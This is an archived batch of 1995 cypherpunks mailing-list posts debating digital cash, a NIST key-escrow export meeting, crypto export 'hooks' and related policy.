> 	All of this is assuming that the digital currency being produced has
> a one-to-one ratio with some "real" currency. If, for instance, the digital
> certificates were indeed bought with a one-to-one ratio from the producer, but
> were traded to others for "real" cash at some market-determined discount, the
> market would incorporate the risk. The traders who were willing to take the
> risk that the certificates were not actually worth one dollar/whatever would
> be able to make a profit by the difference between one digital dollar and one
> "real" dollar. The problem is simplified even more with privately backed
> currencies.

I had assumed that there was a market discount, but it's still not quite
that simple.  It's very hard for markets to deal with *unbounded* risk. 
The biggest problem I see with most of the crypto-cash schemes is that
there is a legitimate scenario -- however low-probability you might
assess it to be -- of break-the-bank catastrophic failure, i.e. in which
someone gains the keys that allow him to essentially print money.  This
kind of low-probability, infinite-cost risk is the kind of thing that
gives underwriters the heebie jeebies.  There's a good reason that most
companies have "Ltd" after their name instead of "Unlimited", in those
countries where that's the naming convention.

Excerpts from mail.nonpersonal: 5-Dec-95 Re: Geodesic Payment System..
Wei Dai@eskimo.com (1749*)

> But if we're converting
> between one electronic system and another, then cryptographic protocols
> reduce the cost of protection to nearly zero for even small organizations. 

This is probably true, although protocol translation is a notoriously
tricky and subtle business.  But my comments were aimed at the
conversion between electronic and physical monetary systems, not between
different electronic systems.  And, for this purpose, totally
non-Internet mechanisms such as SWIFT or US ACH are, in my view,
"physical" systems, for a number of historical reasons.  If you disagree
with that classification, however, you just push the line down a little
further, but don't change the underlying assessment.  -- NB
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 6 Dec 95 04:15:46 PST
To: cypherpunks@toad.com
Subject: Re: The "Future" Fallacy
Message-ID: <2.2b8.32.19951206121932.00842fec@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:10 AM 12/6/95 -0800, Timothy C. May wrote:

>I found nothing wrong or incorrect with the quote Duncan attributed to Bill
>Gates (I haven't read Gates' book).
>
>I couldn't understand Duncan's koan, shrugged, and moved on.
>
>--Tim May

From my reply to someone called billg@microsoft.com:

>>"Soon any child old enough to use a computer will be able to transmit coded
>>messages that no government on earth will find easy to decipher."
>>
>>DCF

The two "errors" in the sentence are:

1) The use of the future tense.  There are a host of encryption products
available today that are very strong.  Unless you were talking about ease of
use.  Newt Gingrich -- in a similar statement -- was speaking generally
rather than about children and that's where I noticed the error before.  It
is a present not a future capability.

2)  And no government on earth will find easy to decipher is an
understatement.  As I'm sure you know, properly deployed modern cryptography
(or even the 100-year-old technology of one-time-pads) is mathematically
infeasible to break.  Though of course attacks other than decryption remain possible.

Both of these are really quibbles rather than substantial criticisms.

DCF

"Who wonders if this is the real BG or one of the 90% of forged messages
mentioned in the National Press Club speech."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 6 Dec 95 04:54:35 PST
To: cypherpunks@toad.com
Subject: re: Secret Clearance
Message-ID: <28532.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In message Wed, 6 Dec 1995 06:57:12 -0500 (EST),
  Jay Holovacs <holovacs@styx.ios.com>  writes:

> I think it's interesting that police and even FBI that normally operate
> "legally authorized" wiretaps do not require SECRET clearance. What
> really goes on here?

You can't walk the halls of the FBI headquarters without a clearance.

The RBOCs do have cleared people that perform the taps.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 7 Dec 95 08:00:59 PST
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: 1)Age etc CA 2)Swedish Digicash
Message-ID: <199512071601.IAA23556@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:06 AM 12/7/95 -0500, Duncan Frissell wrote:
> Is there an existing Post Office Bank in Sweden?  If so, can foreigners open
> accounts? 

While any foreign account is of course better than any home country
account, Sweden is not really a place that I would like to keep
my money.  High taxes, rigid controls, intrusive and unpredictable
government, and, most importantly, the country has repeatedly 
teetered on the edge of bankruptcy.

I would wait for some more solvent foreign country to get into digicash.

More to the point -- few people will accept or spend digicash 
unless those unreasonable charges come right down.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Wed, 6 Dec 95 08:15:37 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: The "Future" Fallacy
Message-ID: <9512061617.AA03020@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Duncan Frissell 

2)  And no government on earth will find easy to decipher is an
understatement.  As I'm sure you know, properly deployed modern cryptography
(or even the 100-year-old technology of one-time-pads) is mathematically
infeasible to break.  Though of course attacks other than decryption remain 
possible.
..................................................

I see what you mean.  When I read his statement, I focused on the "will be able 
to transmit coded messages".

I was thinking about the efforts of the govmt to prevent it, and about how 
nevertheless even a 10-year old will be able to accomplish it in spite of the 
efforts against it (GAK).

  ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 6 Dec 95 05:21:21 PST
To: holovacs@styx.ios.com (Jay Holovacs)
Subject: Re: Secret Clearance
In-Reply-To: <Pine.3.89.9512060640.A22538-0100000@styx.ios.com>
Message-ID: <199512061318.IAA11175@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I think it's interesting that police and even FBI that normally operate 
> "legally authorized" wiretaps do not require SECRET clearance. What 
> really goes on here?

??
Feeb's have TS clearances, at least the ones I've dealt with.
I strongly doubt any don't..

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 6 Dec 95 06:28:04 PST
To: cypherpunks@toad.com
Subject: ERA_sur
Message-ID: <199512061429.JAA08877@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   There's implicit boost for encryption in the controversial
   "undeleting" of personal files on Jean Lewis's floppy,
   subpoenaed by Whitewater investigators.

   Peter Wayner has a thread about it on Cyberia-L.

   NYT had a brief about it yesterday, WSJ an editorial today.


   ERA_sur












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 6 Dec 95 06:38:00 PST
To: pfarrell@netcom.com
Subject: NIST GAK export meeting, Long version part 1
Message-ID: <34717.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


NIST Key Export meeting, December 5, 1995 Long version, Part 1 of N
This covers the criteria, except interoperability.

(To keep TCMay's prediction from becoming true, I'll put this out in parts) 


This really needs a hypertext media. I'll build one for html page. Please
bear with me on this, pure ASCII mail version.
This is a write-up of stuff I left out of the summary.
I'll merge them together on my nistpage, probably Friday.
You've already seen the short write up.

There is a fair amount of information on the NIST web server. Use url:
< http://csrc.ncsl.nist.gov/keyescrow/>

As David Lesher noted, one of the most significant things was obvious in
the parking lot.  Unlike September's meeting, this time it was empty.
Inside the hall, it was obvious that no one came. It was packed in
September, and now, entire rows were empty. I'm bad at guessing numbers,
but it's easy to guess that only 1/3 as many people showed. Maybe less.

>The meeting was hosted by Ed Roback of NIST,

The meeting was in general a repeat of September's meeting, and similar
meetings that have been going on for years. Both sides talk past each
other. I think this has degenerated into a parallel with the abortion
debate. There is no common ground.


>He said that they have studied the encryption that is supposed to be widely available on the Internet.
>He said that viewed by crypto experts, not much is very good. He mentioned "two incidents" where
>Netscape had weak implementations. He feels that companies will not trust software over the 'net. that
>they "want the US Government to say that 'this is good enough'."

I assume that the "two incidents" don't count breaking RC4-40.  I can't
remember two Netscape security incidents, unless he means to count RJC's
buffer overflow, all I can remember is Ian's key generation problem.

>Clint Brooks, of NSA, then went over the revised criteria. He claimed that they
>were surprised at the industry concern over "one product" for worldwide markets.

He stated that they were addressing "not domestic policy, per se, but we
keep wrapping around" because of the 'one product' issue.

The criteria are on the NIST page,
url: <http://csrc.ncsl.nist.gov/keyescrow/criteria.txt>

They handed out a guide to the changes in the criteria between September
and now. This is available from NIST as url:
<http://csrc.ncsl.nist.gov/keyescrow/bground.html>

Here is a portion of it:
Old Criterion 1.     Moved to #7;
Old Criterion 2.     Moved to #8;
Old Criterion 3.     Split into #1 and #2
Old Criterion 5.     Moved to #10
Old Criterion 6.     Moved to #9;
Old Criterion 7.     Moved to #5;
Old Criterion 8.     Moved to #6;
Old Criterion 9.     Deleted.
Old Criterion 10.    Moved to #3;

Only in Washington. Oh yeah, they also clarified a lot of the wording.

Ideas that I thought important enough to make notes of concerning the
criteria:

These criteria do not address either hardware or non-escrow encryption.
Export controls of these are not changed, they can be exported with the
current procedures.

Brooks said that these rules are not applicable to the protection of
internal data for US corporations, even for overseas locations of US firms.
He said that getting permission to export for _internal corporate use_ is
easy, if it is to protect corporate secrets and for internal communication.
I took this to mean that a multi-national, US-based corporation can get a
permit for ViaCrypt and export it for their own use. [later in the day,
some people mentioned that this isn't nearly as easy as Brooks claimed.]

He said that the intent in the new wording is flexibility. They don't want
to prescribe implementation details, he wants industry to invent what
sells. He specifically stated that the meetings were not about setting
standards. This caused at least a fair amount of confusion, probably due to
the fact that NIST used to be called National Bureau of Standards, and NBS
set standards all the time. For example, a couple of folks were interested
in interoperability, say between a Netscape encryption system and one made
by, say, Microsoft. This meeting did not address this level of
interoperability.

about #2, "The product's key escrow cryptographic functions shall be
inoperable until the key(s) is escrowed in accordance with #3." Brooks said
that the intent was to allow vendors to make a single product that doesn't
activate the key-escrow function if not needed. The idea was that when the
keys are escrowed, the encryption engine would be activated. He also said
that "manufacturers may not want to be in the key escrow business" and
would therefore want to ship products that could be activated by a third
party escrow agent.

While talking about #3, "3. The product's key escrow cryptographic functions' key(s)
     shall be escrowed with escrow agent(s) certified by the U.S.
     Government, or certified by foreign governments with which
     the U.S. Government has formal agreements consistent with
     U.S. law enforcement and national security requirements."

He stated that this does not preclude the use of "other agents." This
became a major issue throughout the day. Ken Mendelson, staff attorney at
TIS, asked (roughly) "Under what authority does the US Government grant
certification to agents?" The response was a run around. Another hot issue
was whether you can "hold your own keys" rather than using a third party.
Seems that the corporate users are arguing that they want to hold their own
keys, and the government reacted to that favorably (not unfavorably?).
[Later in the day, Geoff Greiveldinger was asked if US citizens have the
right to hold their own keys. Geoff was forced to admit that, "yes, you can
hold your own keys"]

#5, "5.    The product's key escrow feature shall allow access to the
      key(s) needed to decrypt the product's ciphertext regardless
      of whether the product generated or received the ciphertext."

Contains a significant change that was not discussed in September. It means
that having the key for either end is sufficient. Brooks conceded that this
was a big change, but claimed it was needed. The claim that one-ended
surveillance is easier is most likely true.  It clearly is easier if one
end is US based and using GAK and the other is foreign where there is
respect for civil liberties.

He even claimed that it made the system less intrusive: His argument was
roughly:

Let's say they are snooping on me.  With one-ended, they can read all of my
messages, to and from, without needing the keys of my correspondents. (let's
pick Geoff G. as an arbitrary correspondent) With two ended, they'd have to
get both my key and Geoff's, and then they could read all of the messages
Geoff gets or sends.

I said it was _their_ argument. Seems to me to be groundless, unless they
got the keys of everyone in the chain, all of the folks that I talk to, all
of the folks that everyone I talk to, etc.

on "7.    The product's key escrow cryptographic functions shall use
      an unclassified encryption algorithm with a key length not
      to exceed sixty-four (64) bits."

This is really aimed at session keys, or at least non-RSA keys. I suggested
that they really needed some wording that makes it clear.

>He said that the 64-bit key limit is not meant to restrict RSA keys to
>64-bits, but rather to restrict the session keys that are encrypted using
>RSA. Unspoken was the assumption that the 2000 bit RSA secret key would have to be escrowed.

on "8.    The product's key escrow cryptographic functions shall not
      provide the feature of multiple encryption (e.g., triple-
      DES)."

He pointed out that the wording used to say "prevent" and now just says
"not provide".  He acknowledged that "prevent" was impossible.

on "9.    The product's key escrow cryptographic functions shall
      interoperate only with key escrow cryptographic functions in
      products that meet these criteria, and shall not
      interoperate with the cryptographic functions of a product
      whose key escrow encryption function has been altered,
      bypassed, disabled, or otherwise rendered inoperative."

Brooks said that this was intended to allow multiple modes, such as
compatibility with other encryption schemes. Of course, he said, the other
modes are subject to export restrictions.

Somewhere in the discussion, Ed Appel took over for Brooks. Appel is
"Director of Counter Intelligence Programs, National Security Council, The
White House". He was introduced as FBI.

>There were some interesting (and bad IMHO) implications of interoperability.
I'll cover them more in the next section

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 08:29:13 PST
To: cypherpunks@toad.com
Subject: Re: Solution for US/Foreign Software?
Message-ID: <aceb04e0120210040cd0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:06 AM 12/6/95, jim bell wrote:

>>"Crypto hooks," basically the scheme you are proposing, were thought of by
>>the authorities and are not a bypass of the crypto export laws.
>>--Tim May
>
>
>I'm not saying they are a "bypass" of the laws.  Rather, I'm saying that
>if the goal is to:
>
>1.  Let companies like Netscape make foreign sales.
>
>2.  Still comply with the letter of the law.
>

And I'm saying that your proposal does NOT comply with the letter of the
law. There's no point in arguing this, as the facts are clear. Consult the
ITARs and the previous discussions here and elsewhere on the practice of
leaving "hooks" that crypto modules can later be attached to.


>If the USG tries to take the position that "any program which can be
>modified into another program that gets around GAK is prohibited from
>export," then they're going to have to stop allowing the export of
>pre-formatted floppy disks because they're likewise an XOR away from PGP.
>
>So we're back to square one:  Does the USG intend to allow ANY programs to
>be exported?

No, the USG has not (yet at least) prohibited export of blank programs or
disks. The "no hooks" rule has some ambiguities, but is by no means quite
this dumb.

All I'm saying is that you need to look at what the laws are, and how they
have affected existing products and companies, before announcing a
"solution."

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 6 Dec 95 09:49:46 PST
To: jimbell@pacifier.com (jim bell)
Subject: Re: Solution for US/Foreign Software?
In-Reply-To: <m0tNEsF-00090XC@pacifier.com>
Message-ID: <9512061750.AA07635@krypton.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> I'm not saying they are a "bypass" of the laws.  Rather, I'm saying that
> if the goal is to:
> 
> 1.  Let companies like Netscape make foreign sales.
> 
> 2.  Still comply with the letter of the law.

It takes more than one or two people to coordinate an international effort.
Once more than a few people know about it, it becomes "company policy" or
"corporate objective", in which case, the NSA/DoS will eventually figure it
out and start levying heavy fines and jailing the individuals.

The main point is that there is no such thing as the "letter of the law".
What they enforce is much broader than that, and how they enforce it is much
more subtle than clear-cut criminal prosecution.  Therefore, you cannot just
use literal loopholes just because it's not clear, because the law they are
enforcing is not clear either.

This response should almost be an FAQ for this crowd.

Ern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Wed, 6 Dec 95 06:45:57 PST
To: <cypherpunks@toad.com
Subject: re: NIST GAK export meeting, sv
Message-ID: <9512061445.AA14166@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


"Hieronymous" says:
>       (Thanks for the summary, Pat.)
>       This last bit is really rich. I can't think of a single publically
> defensible reason for the stipulation that every escrow agent must employ
> someone with SECRET clearance, but I *can* think of a publically
> indefensible reason for it -- to facilitate those spooky non-court wiretap
> authorizations that've been alluded to in the fine print of the GAK
> proposals.

This is probably one reason. Another is that they could shut down an
escrow agent at a moment's notice by pulling the clearances. We
haven't seen the other requirements, but an interesting question is
what happens when an escrow agent goes out of business.

Speaking for myself....

 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 6 Dec 95 10:00:28 PST
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: The "Future" Fallacy
In-Reply-To: <Pine.SUN.3.91.951206042314.18935A-100000@polaris.mindport.net>
Message-ID: <9512061801.AA07656@krypton.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > > Bill Gates (like Mister Newt before him) committed what I call the Future
> > > Fallacy in "The Road Ahead."  Page 106.
> > >
> > > "Soon any child old enough to use a computer will be able to transmit
> > > coded messages that no government on earth will find easy to decipher."
> > >
> > > Billg is an optimist.
> >
> > I found nothing wrong or incorrect with the quote Duncan attributed to Bill
> > Gates (I haven't read Gates' book).
>
> I think Duncan was mad at the 'soon.'  Why not today?

I think I can answer this question because I was an obnoxious little
hacker with an Atari 800 when I was a kid.  The only thing I did not
have was a modem and an Internet connection (thus ability to read
sci.crypt.research etc ...)

I did have arbitrary precision math libraries (although I did not
have any engineering concept of "libraries"), and I had written some
non-trivial scrambling code (it's not RSA, of course).  I am, by no
means, a super-smart person.  Therefore, it is not a stretch to
believe that kids today can perform powerful encryption in the
privacy of their own homes.

Therefore, to Bill G and his "prophecy": "been there, done that" ...
(Apologies to those who hate that phrase; I hate it too, but it is
so obnoxious that it gets the point across.)

Ern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 08:50:35 PST
To: cypherpunks@toad.com
Subject: Compliance Audits
Message-ID: <aceb087813021004e525@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



(This is just a tangential thought, inspired by someone's commentary. Not a
substitute for first principles argument.)

At 3:53 PM 12/6/95, Brad Dolan wrote:

>Firearms dealers are required to keep records of purchases.  In theory
>(and by law) they don't pass these records along to the authorities
>except in response to specific inquiries.
>
>However, in the last couple of years there have been numerous reports of
>mass copying of records by BATF or surrogates (specifics on request).
>
>And when a firearms dealer goes out of business, all records go to the BATF.
>
>So there is something of a precedent.

One FFL holder reported someplace (?) that when he drops out of the
business--soon, as the licensing and reporting requirements, plus the fees,
have risen a lot--he expects to have an accidental "office fire" to destroy
the boxes of records he's kept for the last 20 years.

I think BATF is currently too preoccupied with other more pressing matters
to go around and conduct "compliance audits," but such audits are likely to
increase in the future. (Especially as the new FFL licensing rules and fees
squeeze the number of FFL holders down to a "manageable" level, which was
one of the stated reasons for cranking up the fees and tightening the
reporting requirements a while back.)

The connection with crypto and key escrow is that licensed escrow agents
(Big Brother Inside) will likely face compliance audits. Some random amount
of traffic may even be opened to ensure compliance.

(More speculatively, the rules may be written so that compliance audits are
done on the traffic of end-users, with some fraction opened and the
contents measured to ensure they are readable. The old "Use a random
number, go to jail" scenario.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Wed, 6 Dec 95 10:57:43 PST
To: tcmay@got.net (Timothy C. May)
Subject: Re: Solution for US/Foreign Software?
Message-ID: <m0tNOTZ-0008yNC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>At 8:06 AM 12/6/95, jim bell wrote:
>
>>>"Crypto hooks," basically the scheme you are proposing, were thought of by
>>>the authorities and are not a bypass of the crypto export laws.
>>>--Tim May
>>
>>
>>I'm not saying they are a "bypass" of the laws.  Rather, I'm saying that
>>if the goal is to:
>>
>>1.  Let companies like Netscape make foreign sales.
>>
>>2.  Still comply with the letter of the law.
>>
>
>And I'm saying that your proposal does NOT comply with the letter of the
>law. There's no point in arguing this, as the facts are clear. Consult the
>ITARs and the previous discussions here and elsewhere on the practice of
>leaving "hooks" that crypto modules can later be attached to.


NO!  You didn't read my commentary carefully enough.   These "hooks" (your words) will, in effect, already be connected to encryption software weak enough to make NSA happy.  You know, 40 bit keys or something like that. 
But instead of being in one large file, embedded into a program, it'll be  TWO files.  Simple programming change.  Everything that implements/defines/limits the encryption to 40 bits will be in the smaller file.  
This really isn't a "hook," it's an internal connection between two portions of the same program. (actually, it wouldn't need to be in two separate files; a file which implements a patch for the first file would work great.)

It'll be exportable, because its key size is "acceptable."  At the time the export license is requested, the replacement module to increase key size probably won't even  exist, in order to avoid giving the USG an excuse to deny the export license.   After the license is obtained, the replacement module is written and shipped to domestic users.

I fully realize the USG won't "like" this kind of thing.  But if they are trying to take the position that certain kinds of encryption software CAN be exported, and some can't, they're going to have to approve SOME programs for export, using criteria which at least pretend to be objective.  

In view of the nearly limitless possibility of patches, how would YOU distinguish between programs?  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 6 Dec 95 07:37:43 PST
To: cypherpunks@toad.com
Subject: Re: No More Netscape Comments from Me
Message-ID: <v02120d10aceb5449cdea@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>So, have fun riding the Great Internet Bubble of 1995!

Yeah... I wonder what the price of Netscape puts around, say, March are
these days...

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 6 Dec 95 10:40:21 PST
To: cypherpunks@toad.com
Subject: Re: Barring access to Netscape
Message-ID: <2.2b7.32.19951206184122.00836cd4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:28 PM 12/1/95 -0500, you wrote:

>You can get your server to simply put that at the top of every page
>served to a Netscape client, followed by a horizontal line and the
>normal web page. It should be easy to put together the hacks to do
>that and get them out to lots of people. Watch how fast people would
>switch from Netscape, especially were it widely deployed. You would
>then watch a fast fall in Netscape stock, which would likely piss Jim
>Clark off far more than anything else one could do.

This type of page hack is pretty easy.  Take a look at _HTML & CGI
Unleashed_ from Netsams press.  Page 410 has a script that can be easily
modified to do something similar.  (Great book, but lacks some of the more
advanced server redirect tricks I have seen elsewhere.)  The example is for
displaying an optional display for browsers that cannot deal with image
maps.  It can be altered to do the same to any browser.

>We need HTML 3.0 capable browsers for all platforms, though.

They (the W3O) need to agree what HTML 3.0 consists of before that will
happen soon...

|       What is the Eye in the Food Pyramid?      | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 6 Dec 95 07:41:53 PST
To: Nathaniel Borenstein <cypherpunks@toad.com
Subject: Re: Geodesic Payment Systems?  (was Re: Meeting notes from ANSI X.9 Meeting onElectronic Payment)
Message-ID: <v02120d30aceb5c57b23c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Once again, Hettinga shoots from the hip, and hits an expert instead...
;-)

At 9:07 AM 12/5/95, Nathaniel Borenstein wrote:

>There are some interesting unspoken assumptions here.  To calculate
>anyone's "cost" on a transaction requires the complex amortization of
>costs over many transactions, with assumptions/projections about the
>transaction volume.  I have no idea where you came by either of your
>numbers, MTB's or FV's, but I can tell you that your guess about FV is
>off the mark.  And I'm sure that MTB is no more eager than we are to
>publicly dissect all the underlying cost structures, so I have no idea
>what the 50 cents that you cite really means.

The 50 cents actually comes from this week's InfoWorld, Bob Metcalfe's
column. I have no idea where he got the 50 cents, but he did say digital
cash, so I expect that he means MTB.

>To be perfectly clear:  our minimum service charge is 30 cents, not 5
>dollars.  If we didn't think it was worthwhile to take transactions that
>small, we wouldn't do so.

Fine. Are we including the cost of the credit card transaction to the
consumer? Fees, interest, that stuff? There are lots of hidden costs in a
book entry system. With a bearer-certificate system, the price is the
spread between the certificate's bid and asked prices for (a traveller's
check, for instance, is asked at a premium, and redeemed at face value, for
instance. That's all the cost of using them.)

>A true geodesic structure is self-supporting and self-structuring.  A
>cryptographic infrastructure can and should be similar, I agree
>completely.  However, a *monetary* infrastructure needs convertability,
>and the points of conversion are always the best targets of attack for
>criminals.  (I've been casting about for an analogy to physical
>geodesics, and it's hard to find one.  The best I can come up with is to
>imagine that in order to convert a carbon buckyball to a more
>conventional set of carbon molecules, you had to do it through a service
>bureau that was capable of error, fraud, or subversion by outside
>criminals.  This would ONLY matter if you ever wanted to do such
>conversions, but it would matter a lot then, especially if you had to
>suffer a serious financial loss if you got the wrong carbon molecules at
>the end of the process.)

Sometimes I feel like I'm beating this geodesic metaphor like a dead horse
sometimes... ;-).

>
>IF you wanted to settle for a totally non-convertible economy (like
>rubles in the old Soviet Union, or like the LETS system on the net
>today, as I understand it) then you could build it geodesically.

Really?

>  But if
>you want to be able to convert back and forth between Internet payment
>systems and non-Internet payment systems, it can never be truly
>geodesic.  It will always be attackable at the points of conversion.
>(You may "trade digital certificates", but how do you know the ones
>you're receiving were obtained for legitimate real-world value?)
>Because of this, the underwriting financial institutions, who have a
>very reasonable desire to limit their own risk, will inevitably seek the
>protection-by-traceability offered by something less than perfect
>anonymity.  We may not like it, but it's a very natural position to be
>taken by those who are actually bearing the financial risks at the point
>of conversion.

That may be true, Nathaniel, but just because the people who bring the
money off the net need to be identified to the digital cash underwriter's
(actually the underwriter's bank's) satisfaction, doesn't mean that the
trades on the net can't be totally anonymous. We've gone over this before.
Let's build a model to talk about this, and then you'll see what I mean.

Suppose I open an anonymous bank account with ATM card. Then, on the net, I
buy digital cash from a digital cash underwriter. The web-page reads my ATM
swipe and PIN, and then pumps it (without the underwriter being able to
read it) through to my bank, who says to the underwriter, "Yup, there's
money here, send it to him, and I'll wire it to you (now/overnight/whatever)."
The digital cash underwriter then issues me my digital cash, and I put it
on my hard drive. I buy stuff on the net. I sell stuff on the net.
Sometimes I go online with the trade to check my buyers' cash, sometimes I
don't. Element of risk there, but this risk can be made accountable. It's
probably always going to be cheaper to do offline transactions, but there's
the possibility that when I cash in that money, it has been spent already.
Fair trade. It's probably quantifiable and thus can be dealt with. We won't
know till we have data.

Being an astute businessman (you can tell this is a model, right?), I end
up with positive cashflow. So, that money I don't invest with a portfolio
manager on the net by buying anonymous bearer certificates for his mutual
fund, ;-), I decide to take off of the net and buy Netscape puts, March
1996, $10.

So, I go to the underwriter's page (maybe I go to multiple underwriters'
pages, or maybe there's an enterprising third-party money changer who
honors all comers for a cut), and I cash out. I swipe my ATM and punch my
PIN, and my bank says to the underwriter "OK, I know that account, how much
are you sending me?", and the underwriter says how much, and how and when
the money would arrive (wire? Rollerblade messenger? bunch of militia types
in a purple Hummer?, anyway...). And there's money back off of the net.

In this model, there's no reason why I can't send an anonymous software
agent to buy stuff for me, why I can't buy anonymously or sell anonymously.

So, given that model, what's the problem?


Now, I've also been thinking about something else.

Wei Dai has been talking about how anonymity will always cost more, and
certainly, in the model above, there's a certain risk with doing off-line
transactions. You don't know if the cash in the transaction is
double-spent, like I said above, but that "special stuff" has to be done to
accommodate anonymity, which will always cost more.  I'll come back with a
whole blather on this next week when I get back from the CyberDog Kitchen
(I'm here, and Gromit says "hi"), but I think it comes from what the
default mechanism for commerce is going to be, threaded, audit-trailed
x.blabla or anarchic, geodesic, bearer-certificates. I bet you can guess
where I'm going to come down on this...

Cheers,
Bob Hettinga




-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 6 Dec 95 10:46:58 PST
To: cypherpunks@toad.com
Subject: Microsoft Internet Announcements Thursday, December 7, 1995
Message-ID: <Pine.ULT.3.91.951206103309.4575A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"A day that will live in infamy."

Anyone have the exact time that Bill will begin speaking? I think it 
would be "neat" if we timed the release of a complete rewrite of the 
win95netbugs FAQ (with a new security section), improvements to the 
hackmsoft page, and other stuff for 15 minutes after Bill begins.

The win95netbugs FAQ, version 4.00.950, will be posted to the following
